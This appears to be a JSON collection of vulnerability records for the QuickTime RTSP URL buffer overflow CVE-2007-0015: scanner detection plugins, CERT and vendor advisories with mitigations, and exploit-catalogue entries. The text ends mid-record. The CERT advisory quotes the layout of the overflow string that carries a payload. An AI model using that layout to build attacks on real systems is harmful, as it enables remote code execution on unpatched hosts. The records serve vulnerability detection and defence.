{"saint": [{"lastseen": "2022-01-26T11:33:39", "description": "Added: 01/04/2007 \nCVE: [CVE-2007-0015](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0015>) \nBID: [21829](<http://www.securityfocus.com/bid/21829>) \nOSVDB: [31023](<http://www.osvdb.org/31023>) \n\n\n### Background\n\n[QuickTime](<http://www.apple.com/quicktime/player/>) is a media player for Windows and Mac OS platforms. \n\n### Problem\n\nA buffer overflow in QuickTime allows command execution when a user opens a specially crafted QTL file containing a long `**src**` parameter starting with `**rtsp://**`. \n\n### Resolution\n\nDo not open QTL files using QuickTime. \n\n### References\n\n<http://www.kb.cert.org/vuls/id/442497> \n\n\n### Limitations\n\nExploit works on QuickTime 7.1.3.100 and requires a user to open the exploit in QuickTime. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2007-01-04T00:00:00", "type": "saint", "title": "QuickTime rtsp src URL buffer overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0015"], "modified": "2007-01-04T00:00:00", "id": "SAINT:8337315F83A09F3FAB1F8E9AD57C3E2B", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/quicktime_rtsp_src", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:39", "description": "Added: 01/04/2007 \nCVE: [CVE-2007-0015](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0015>) \nBID: [21829](<http://www.securityfocus.com/bid/21829>) \nOSVDB: [31023](<http://www.osvdb.org/31023>) \n\n\n### Background\n\n[QuickTime](<http://www.apple.com/quicktime/player/>) is a media player for Windows and Mac OS platforms. \n\n### Problem\n\nA buffer overflow in QuickTime allows command execution when a user opens a specially crafted QTL file containing a long `**src**` parameter starting with `**rtsp://**`. \n\n### Resolution\n\nDo not open QTL files using QuickTime. \n\n### References\n\n<http://www.kb.cert.org/vuls/id/442497> \n\n\n### Limitations\n\nExploit works on QuickTime 7.1.3.100 and requires a user to open the exploit in QuickTime. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2007-01-04T00:00:00", "type": "saint", "title": "QuickTime rtsp src URL buffer overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0015"], "modified": "2007-01-04T00:00:00", "id": "SAINT:DC0373185C785EAA3F33793CD2BAD62B", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/quicktime_rtsp_src", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2016-10-03T15:01:55", "description": "Added: 01/04/2007 \nCVE: [CVE-2007-0015](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0015>) \nBID: [21829](<http://www.securityfocus.com/bid/21829>) \nOSVDB: [31023](<http://www.osvdb.org/31023>) \n\n\n### Background\n\n[QuickTime](<http://www.apple.com/quicktime/player/>) is a media player for Windows and Mac OS platforms. \n\n### Problem\n\nA buffer overflow in QuickTime allows command execution when a user opens a specially crafted QTL file containing a long `**src**` parameter starting with `**rtsp://**`. \n\n### Resolution\n\nDo not open QTL files using QuickTime. \n\n### References\n\n<http://www.kb.cert.org/vuls/id/442497> \n\n\n### Limitations\n\nExploit works on QuickTime 7.1.3.100 and requires a user to open the exploit in QuickTime. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2007-01-04T00:00:00", "type": "saint", "title": "QuickTime rtsp src URL buffer overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2007-0015"], "modified": "2007-01-04T00:00:00", "id": "SAINT:1D9942467E3D50BE1212A32BC6512414", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/quicktime_rtsp_src", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-07-29T16:40:12", "description": "Added: 01/04/2007 \nCVE: [CVE-2007-0015](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0015>) \nBID: [21829](<http://www.securityfocus.com/bid/21829>) \nOSVDB: [31023](<http://www.osvdb.org/31023>) \n\n\n### Background\n\n[QuickTime](<http://www.apple.com/quicktime/player/>) is a media player for Windows and Mac OS platforms. \n\n### Problem\n\nA buffer overflow in QuickTime allows command execution when a user opens a specially crafted QTL file containing a long `**src**` parameter starting with `**rtsp://**`. \n\n### Resolution\n\nDo not open QTL files using QuickTime. \n\n### References\n\n<http://www.kb.cert.org/vuls/id/442497> \n\n\n### Limitations\n\nExploit works on QuickTime 7.1.3.100 and requires a user to open the exploit in QuickTime. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2007-01-04T00:00:00", "type": "saint", "title": "QuickTime rtsp src URL buffer overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0015"], "modified": "2007-01-04T00:00:00", "id": "SAINT:3FC256AB806C94E5DBC9B040FE7CF4D7", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/quicktime_rtsp_src", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-10-16T16:08:26", "description": "A buffer overflow vulnerability exists in the RTSP URL handler in the version of QuickTime installed on the remote host. Using either HTML, JavaScript or a QTL file as an attack vector and an RTSP URL with a long path component, a remote attacker may be able to leverage this issue to execute arbitrary code on the remote host subject to the user's privileges.", "cvss3": {"score": null, "vector": null}, "published": "2007-02-02T00:00:00", "type": "nessus", "title": "QuickTime RTSP URL Handler Buffer Overflow (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0015"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:apple:quicktime"], "id": "QUICKTIME_RTSP_URL_HANDLER_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/nessus/24268", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(24268);\n script_version(\"1.23\");\n\n script_cve_id(\"CVE-2007-0015\");\n script_bugtraq_id(21829);\n script_xref(name:\"CERT\", value:\"442497\");\n\n script_name(english:\"QuickTime RTSP URL Handler Buffer Overflow (Windows)\");\n script_summary(english:\"Checks version of QuickTime on Windows\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote version of QuickTime is affected by a buffer overflow\nvulnerability.\" );\n script_set_attribute(attribute:\"description\", value:\n\"A buffer overflow vulnerability exists in the RTSP URL handler in the\nversion of QuickTime installed on the remote host. Using either HTML,\nJavaScript or a QTL file as an attack vector and an RTSP URL with a \nlong path component, a remote attacker may be able to leverage this \nissue to execute arbitrary code on the remote host subject to the \nuser's privileges.\" );\n # http://applefun.blogspot.com/2007/01/moab-01-01-2007-apple-quicktime-rtsp.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ebb12673\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://projects.info-pull.com/moab/MOAB-01-01-2007.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://docs.info.apple.com/article.html?artnum=304989\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.apple.com/archives/Security-announce/2007/Jan/msg00000.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.flexera.com/vulnerability-management/2007/01/quicktime-update-me-and-stay-vulnerable/\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Apple's Security Update 2007-001, which is available via the\n'Apple Software Update' application, installed with the most recent\nversion of QuickTime or iTunes.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apple QuickTime 7.1.3 RTSP URI Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/02/02\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/01/01\");\n script_cvs_date(\"Date: 2018/11/15 20:50:28\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:quicktime\");\nscript_end_attributes();\n\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n \n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"quicktime_installed.nasl\");\n script_require_keys(\"SMB/QuickTime/Version\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\n\n\nver_ui = get_kb_item(\"SMB/QuickTime/Version_UI\");\nver = get_kb_item(\"SMB/QuickTime/Version\");\nif (isnull(ver)) exit(0);\n\niver = split(ver, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\nif (\n iver[0] < 7 || \n (\n iver[0] == 7 && \n (\n iver[1] < 1 ||\n (\n iver[1] == 1 &&\n (\n iver[2] < 3 ||\n (iver[2] == 3 && iver[3] < 191)\n )\n )\n )\n )\n)\n{\n if (report_verbosity > 0 && ver_ui)\n {\n report = string(\n \"\\n\",\n \"QuickTime \", ver_ui, \" is currently installed on the remote host.\\n\"\n );\n security_warning(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_warning(get_kb_item(\"SMB/transport\"));\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-30T16:07:49", "description": "The remote host is running a version of Mac OS X 10.3 or 10.4 which does not have Security Update 2007-001 applied.\n\nThis update fixes a flaw in QuickTime which may allow a rogue website to execute arbitrary code on the remote host by exploiting an overflow in the RTSP URL handler.", "cvss3": {"score": null, "vector": null}, "published": "2007-01-24T00:00:00", "type": "nessus", "title": "Mac OS X Security Update 2007-001", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0015"], "modified": "2022-06-29T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD2007-001.NASL", "href": "https://www.tenable.com/plugins/nessus/24234", "sourceData": "#TRUSTED 17229edf7d45e35e53166dbf46f09b509cedc93169d2ed7dfb0d0f96c59d991db65f6060d08448182e3d00164b4986c67c76f2e5294d5f4261f16d046fe9500ef7b4e208ad439a67d0a4cada6124408f312ed98842ce527e310792a755d5d7011a1f055025e0e13c58959d94855db2bc489a341dc5d016884a2cdc77c97e19b801e9f608e26356341a21f85254a129d83e15921bc18352ff6a59307e615ce48bd711a614d1acea62d917c692712976e0463146c98f00d417dd0f7150a134c07f958ca52cbea2212c1174530f6f14c1daffb259a912844107980016b496568ccc48f8a8e07ddbcdc6b127858b65eb93673b364226136d2225c9a59d0435c65d8e0e0d70f21abee445f0a9b18041433b06e21233693b5dfb4d78e428ea94346345d36fb401e16fdcbc7dffd953ec4c452f76fb4728ad77a842760fe47a194412c30bcaf5e3b1b62f3b7fd7c959f3236ba5813ae7079222a601e2931e4130f313269cfebad4757be2a59f60f685bbc5aba3d3386648b13945c0c8529e518085d8bf61a1895401183e30311608719eaa550de8cee4f271944696c38e8fcf57c9f530e25990e7dfd3d826e27e47e7ab2c3679c6b585395f8932845ff5f4a0443ec3e371a3caa2dbabde5ca9a526a8cf8a00b9f1da67f8296f5f9dab27f56f3ccdc15fed81605f42fbb4d0267368c827edaba2fd09ed5eaef46ae9e3fea31f564f583d\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(24234);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/29\");\n\n script_cve_id(\"CVE-2007-0015\");\n script_bugtraq_id(21829);\n\n script_name(english:\"Mac OS X Security Update 2007-001\");\n script_summary(english:\"Check for the presence of the SecUpdate 2007-001\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update which fixes a security\nissue.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X 10.3 or 10.4 which\ndoes not have Security Update 2007-001 applied.\n\nThis update fixes a flaw in QuickTime which may allow a rogue website to\nexecute arbitrary code on the remote host by exploiting an overflow in\nthe RTSP URL handler.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://docs.info.apple.com/article.html?artnum=304989\");\n # http://www.apple.com/support/downloads/securityupdate2007001universal.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c80700ff\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.apple.com/support/downloads/securityupdate2007001panther.html\");\n script_set_attribute(attribute:\"solution\", value:\"Install Security Update 2007-001.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apple QuickTime 7.1.3 RTSP URI Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/01/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/01/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2007-2022 Tenable Network Security, Inc.\");\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\");\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"macosx_func.inc\");\n\n\nif(sshlib::get_support_level() >= sshlib::SSH_LIB_SUPPORTS_COMMANDS ||\n get_one_kb_item('HostLevelChecks/proto') == 'local')\n enable_ssh_wrappers();\nelse disable_ssh_wrappers();\n\nfunction exec(cmd)\n{\n local_var buf, ret, soc;\n\n if ( islocalhost() )\n buf = pread(cmd:\"/bin/bash\", argv:make_list(\"bash\", \"-c\", cmd));\n else\n {\n ret = ssh_open_connection();\n if ( ! ret ) exit(0);\n buf = ssh_cmd(cmd:cmd);\n ssh_close_connection();\n }\n\n if ( buf !~ \"^[0-9]\" ) exit(0);\n\n buf = chomp(buf);\n return buf;\n}\n\n# Look at the exact version of QuickTimeStreaming\ncmd = GetBundleVersionCmd(file:\"QuickTimeStreaming.component\", path:\"/System/Library/Quicktime\");\nbuf = exec(cmd:cmd);\nset_kb_item(name:\"MacOSX/QuickTimeSteaming/Version\", value:buf);\n\nversion = split(buf, sep:'.', keep:FALSE);\n\nif (( int(version[0]) == 7 && int(version[1]) < 1 ) ||\n ( int(version[0]) == 7 && int(version[1]) == 1 && int(version[2]) < 3 ) ) {\n\t security_warning( 0 );\n\texit(0);\n}\nelse if ( int(version[0]) == 7 && int(version[1]) == 1 && int(version[2]) == 3 )\n{\n cmd = _GetBundleVersionCmd(file:\"QuickTimeStreaming.component\", path:\"/System/Library/Quicktime\", label:\"SourceVersion\");\n buf = exec(cmd:cmd);\n if ( int(buf) < 4650200 ) security_warning(0);\n}\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-03-10T16:33:47", "description": "Apple QuickTime is a multimedia player that supports a wide range of media formats. The software supports parsing and displaying still image files as well as numerous audio and video formats. It also provides libraries and plugins for other applications, such as browsers, to read QuickTime media files. There exists a stack buffer overflow vulnerability in Apple QuickTime. The vulnerability is caused due to lack of boundary checks when processing the \"rtsp://\" URLs. By enticing the target user, a remote unauthenticated attacker may leverage the vulnerability to inject and execute arbitrary code in the security context of the currently logged in user. In an attack case where code injection is not successful, the affected application will terminate abnormally. In a more sophisticated attack where code injection results might be successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user.", "cvss3": {}, "published": "2014-04-16T00:00:00", "type": "checkpoint_advisories", "title": "Apple Quicktime RTSP URL Buffer Overflow - Ver2 (CVE-2007-0015)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0015"], "modified": "2014-04-16T00:00:00", "id": "CPAI-2007-209", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-07T15:17:21", "description": "A buffer overflow vulnerability has been reported in Apple QuickTime. The vulnerability is due to lack of boundary checks when processing the \"rtsp://\" URLs. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system or cause application crashes.", "cvss3": {}, "published": "2014-04-16T00:00:00", "type": "checkpoint_advisories", "title": "Apple Quicktime RTSP URL Buffer Overflow - Ver2 (CVE-2007-0015)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2007-0015"], "modified": "2014-04-16T00:00:00", "id": "CPAI-2014-1406", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "cert": [{"lastseen": "2021-09-28T17:51:52", "description": "### Overview\n\nApple QuickTime may allow remote arbitrary code to be executed via a long src parameter in RTSP URL strings.\n\n### Description\n\nA vulnerability exists in the way Apple QuickTime handles specially crafted Real Time Streaming Protocol ([RTSP](<http://www.ietf.org/rfc/rfc2326.txt>)) URL strings. An attacker may be able to craft a [QTL](<http://developer.apple.com/documentation/QuickTime/QT4WebPage/samplechap/special-11.html>) file to take advantage of this vulnerability. However, there are other attack vectors that do not involve QTL files. According to [MOAB-01-01-2007](<http://projects.info-pull.com/moab/MOAB-01-01-2007.html>):\n\n_By supplying a specially crafted string (rtsp:// [random] + semicolon + [299 bytes padding + payload]), an attacker could overflow a stack-based buffer, using either HTML, Javascript or a QTL file as attack vector, leading to an exploitable remote arbitrary code execution condition._ \nNote that since QuickTime is a component of Apple iTunes, iTunes installations are also affected by this vulnerability. We are aware of publicly available proof-of-concept code that exploits this vulnerability. \n \n--- \n \n### Impact\n\nA remote, unauthenticated attacker may be able to execute arbitrary code or cause a denial of service. \n \n--- \n \n### Solution\n\n**Apply Update** \nThis issue is addressed in Apple Security Update [2007-001](<http://docs.info.apple.com/article.html?artnum=304989>). An update for Mac OS X is available on [Apple Downloads](<http://www.apple.com/support/downloads/>) and via Software Update. An update for Microsoft Windows XP and 2000 systems is availble via the [Apple Software Update](<http://docs.info.apple.com/article.html?artnum=304264>) application installed with QuickTime 7.1.3. \n \n--- \n \n \n**Disable the QuickTime ActiveX controls in Internet Explorer** \n \nThe vulnerable QuickTime ActiveX controls can be disabled in Internet Explorer by setting the kill bit for the following CLSIDs: \n \n`{02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}` \n`{4063BE15-3B08-470D-A0D5-B37161CFFD69}` \nMore information about how to set the kill bit is available in [Microsoft Support Document 240797](<http://support.microsoft.com/kb/240797>). Alternatively, the following text can be saved as a `.REG` file and imported to set the kill bit for these controls: \n \n`Windows Registry Editor Version 5.00` \n \n`[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}]` \n`\"Compatibility Flags\"=dword:00000400` \n \n`[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{4063BE15-3B08-470D-A0D5-B37161CFFD69}]` \n`\"Compatibility Flags\"=dword:00000400` \n**Disable the QuickTime plug-in for Mozilla-based browsers** \n \nUsers of Mozilla-based browsers, such as Firefox can disable the QuickTime plugin, as specified in the PluginDoc article [Uninstalling Plugins](<http://plugindoc.mozdev.org/faqs/uninstall.html>). \n \n**Disable file association for QuickTime files** \n \nDisable the file association for QuickTime file types to help prevent windows applications from using Apple QuickTime to open QuickTime files. This can be accomplished by deleting the following registry keys: \n \n`HKEY_CLASSES_ROOT\\QuickTime.*` \nThis will remove the association for approximately 32 file types that are configured to open with the QuickTime Player software. \n \n**Disable JavaScript** \n \nFor instructions on how to disable JavaScript, please refer to the [Securing Your Web Browser](<http://www.us-cert.gov/reading_room/securing_browser/>) document. This can help prevent some attack techniques that use the QuickTime plug-in or ActiveX control. \n \n**Do not access QuickTime files from untrusted sources** \n \nAttackers may host malicious QuickTime files on web sites. In order to convince users to visit their sites, those attackers often use a variety of techniques to create misleading links including URL encoding, IP address variations, long URLs, and intentional misspellings. Do not click on unsolicited links received in email, instant messages, web forums, or internet relay chat (IRC) channels. Type URLs directly into the browser to avoid these misleading links. While these are generally good security practices, following these behaviors will not prevent exploitation of this vulnerability in all cases, particularly if a trusted site has been compromised or allows cross-site scripting. \n \n--- \n \n### Vendor Information\n\n442497\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Apple Computer, Inc. __ Affected\n\nNotified: January 02, 2007 Updated: January 23, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to Apple Security Update [2007-001](<http://docs.info.apple.com/article.html?artnum=304989>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23442497 Feedback>).\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References\n\n * <http://projects.info-pull.com/moab/MOAB-01-01-2007.html>\n * <http://secunia.com/advisories/23540/>\n * <http://www.securityfocus.com/bid/21829>\n * <http://plugindoc.mozdev.org/faqs/uninstall.html>\n * <http://support.microsoft.com/kb/240797>\n * <http://docs.info.apple.com/article.html?artnum=304989>\n * <http://docs.info.apple.com/article.html?artnum=106704>\n * <http://docs.info.apple.com/article.html?artnum=304264>\n * [http://search.info.apple.com/?search=Go&q=2007-001](<http://search.info.apple.com/?search=Go&q=2007-001>)\n * <http://lists.apple.com/archives/Security-announce/2007/Jan/msg00000.html>\n * [http://search.info.apple.com/?search=Go&q=2007-001](<http://search.info.apple.com/?search=Go&q=2007-001>)\n * <http://secunia.com/blog/7/>\n\n### Acknowledgements\n\nThis issue was reported in MOAB-01-01-2007.\n\nThis document was written by Chris Taschner and Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-0015](<http://web.nvd.nist.gov/vuln/detail/CVE-2007-0015>) \n---|--- \n**Severity Metric:** | 27.00 \n**Date Public:** | 2007-01-02 \n**Date First Published:** | 2007-01-02 \n**Date Last Updated: ** | 2007-01-25 22:05 UTC \n**Document Revision: ** | 45 \n", "cvss3": {}, "published": "2007-01-02T00:00:00", "type": "cert", "title": "Apple QuickTime RTSP buffer overflow", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0015"], "modified": "2007-01-25T22:05:00", "id": "VU:442497", "href": "https://www.kb.cert.org/vuls/id/442497", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T11:28:48", "description": "Buffer overflow in Apple QuickTime 7.1.3 allows remote attackers to execute arbitrary code via a long rtsp:// URI.", "cvss3": {}, "published": "2007-01-01T23:28:00", "type": "cve", "title": "CVE-2007-0015", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0015"], "modified": "2017-10-19T01:29:00", "cpe": ["cpe:/a:apple:quicktime:7.1.3"], "id": "CVE-2007-0015", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0015", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:quicktime:7.1.3:*:*:*:*:*:*:*"]}], "canvas": [{"lastseen": "2021-07-28T14:33:10", "description": "**Name**| qt_rtsp \n---|--- \n**CVE**| CVE-2007-0015 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Apple QuickTime rtsp URL Handler Overflow \n**Notes**| CVE Name: CVE-2007-0015 \nVENDOR: Apple \nVersionsAffected: \nRepeatability: \nReferences: http://projects.info-pull.com/moab/MOAB-01-01-2007.html \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0015 \nDate public: \nCVSS: 6.8 \n\n", "edition": 3, "cvss3": {}, "published": "2007-01-01T23:28:00", "title": "Immunity Canvas: QT_RTSP", "type": "canvas", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0015"], "modified": "2007-01-01T23:28:00", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/qt_rtsp", "id": "QT_RTSP", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:20", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\n National Cyber Alert System\r\n\r\n Technical Cyber Security Alert TA07-005A\r\n\r\n\r\nApple QuickTime RTSP Buffer Overflow\r\n\r\n Original release date: January 05, 